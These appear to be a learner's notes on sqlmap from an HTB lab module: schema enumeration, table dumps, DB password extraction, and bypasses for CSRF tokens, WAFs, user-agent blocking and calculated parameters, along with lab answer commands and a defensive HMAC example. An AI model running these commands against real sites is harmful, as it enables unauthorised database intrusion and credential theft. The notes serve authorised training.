SQL Map Essentials
Advanced Database Enumeration
DB Schema Enumeration
--schema
will give us the architectural diagram of the database
sqlmap -u "http://www.galapagh0st.com/?id=1" --schema
Searching for Data
--search
will give us the ability to perform a search across a database
sqlmap -u "http://www.galapagh0st.com/?id=1" --search -T user
The above command has us perform a LIKE-type search, looking for any table with user in the name
sqlmap -u "http://www.galapah0st.com/?id=1" --search -C pass
The above command will search for all columns with pass in the name
sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users
The above will dump the users table from the master database. NOTE: this will ask if we want to automatically crack the hashes it finds
DB Users Password Enumeration and Cracking
--passwords
will allow us to get DB credential passwords
sqlmap -u "http://www.galapaghOst.com/?id=1" --passwords --batch
the above sqlmap command will allow us to grab said passwords
Advanced Database Enumeration Questions
sqlmap command I used for question 1
sqlmap -r Case1.txt --thread 10 --search -C style --batch
sqlmap command for second question:
sqlmap -r Case1.txt --thread 10 --dump -D testdb --batch
then I looked at the dump… bet there is a faster way
Bypassing Web Application Protections
Anti-CSRF Token Bypass
--csrf-token
sqlmap -u "http://www.galapagh0st.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
Unique Value Bypass
--randomize
will allow us to randomize a value being passed
sqlmap -u "http://www.galapaghOst.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
Calculated Parameter Bypass
--eval
galapaGh0st@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
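Added defender-side illustration (not from the page or the HTB module): --eval works above because h is a plain MD5 of id, which any client can recompute. The block below contrasts that check with a keyed HMAC whose secret never leaves the server; the key and the tampered value are constructed for the demo.

```python
import hashlib
import hmac

# Weak "calculated parameter" protection, constructed to mirror the page's
# example: the app expects h = md5(id). Anyone who knows the rule, including
# sqlmap via --eval, can produce a valid h for any id they choose.
def weak_checksum(id_value: str) -> str:
    return hashlib.md5(id_value.encode()).hexdigest()

def weak_check(id_value: str, h: str) -> bool:
    return hmac.compare_digest(weak_checksum(id_value), h)

# Hardened variant: a keyed HMAC over the parameter. Because the key stays
# server-side, a client cannot compute a valid tag for a tampered id.
# Constructed demo key; a real deployment loads a random secret from config.
SERVER_KEY = b"constructed-demo-key-do-not-use"

def sign(id_value: str, key: bytes = SERVER_KEY) -> str:
    return hmac.new(key, id_value.encode(), hashlib.sha256).hexdigest()

def verify(id_value: str, tag: str, key: bytes = SERVER_KEY) -> bool:
    return hmac.compare_digest(sign(id_value, key), tag)

def demo() -> dict:
    # Constructed tampered value standing in for an injected payload.
    tampered = "1 AND 1=1"
    unkeyed_guess = hmac.new(b"", tampered.encode(), hashlib.sha256).hexdigest()
    return {
        # the h value in the page's command is exactly md5("1")
        "page_hash_is_md5_of_1": weak_checksum("1") == "c4ca4238a0b923820dcc509a6f75849b",
        # the weak check accepts any id as long as h is recomputed alongside it
        "weak_accepts_recomputed": weak_check(tampered, weak_checksum(tampered)),
        "hmac_accepts_genuine": verify("1", sign("1")),
        # recomputing MD5, or guessing an HMAC without the key, no longer passes
        "hmac_rejects_recomputed_md5": not verify(tampered, weak_checksum(tampered)),
        "hmac_rejects_unkeyed_guess": not verify(tampered, unkeyed_guess),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```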
IP Address Concealing
--proxy
or --proxy-file
if we have a list of proxies
--tor
can be used too but requires some configuration; to make sure it is configured correctly, use --check-tor
WAF Bypass
--skip-waf
skips sqlmap's heuristic WAF/IPS detection, so we do not make as much noise
User-agent Blacklisting Bypass
If we get 500 errors, the first thing we should suspect is that the user-agent is being blacklisted;
if this is the case, try --random-agent
Tamper Scripts
--tamper
look on the sqlmap wiki for tamper scripts or use --list-tampers
Miscellaneous Bypasses
--chunked
Bypassing Web Application Protections Questions
Question 1 - anti-csrf bypass with custom token
looks like the custom token is this
id=1&t0ken=wPvyKcHy4Y94MM4N3HklPul0V5nvaX2VBV4TFgCqo
sqlmap -u "http://94.237.63.45:52434/case8.php" --data="id=1&t0ken=wPvyKcHy4Y94MM4N3HklPul0V5nvaX2VBV4TFgCqo" --csrf-token="t0ken" --batch --dump -T flag8
Question 2 - Take care of the UniqueID
sqlmap -u "http://94.237.63.45:52434/case9.php?id=1&uid=2231717078" --randomize=uid --batch --dump -T flag9
Question 3 - Primitive protection
sqlmap -r Case10.txt --dump -T flag10 --thread 10 --batch
Tried the above just to see if it gave me any errors or a clue but I got the flag shrug
Question 4 - Filtering of Characters < and >
This sounds like we need to use tamper script between
However, let's run a normal script to see what happens
sqlmap -r Case11.txt --dump -T flag11 --thread 10 --batch
Normal-looking errors... interesting, so we won't get a hint if this happens.
The following is the script used
sqlmap -r case11.txt --dump -T flag11 --thread 10 --batch --tamper=between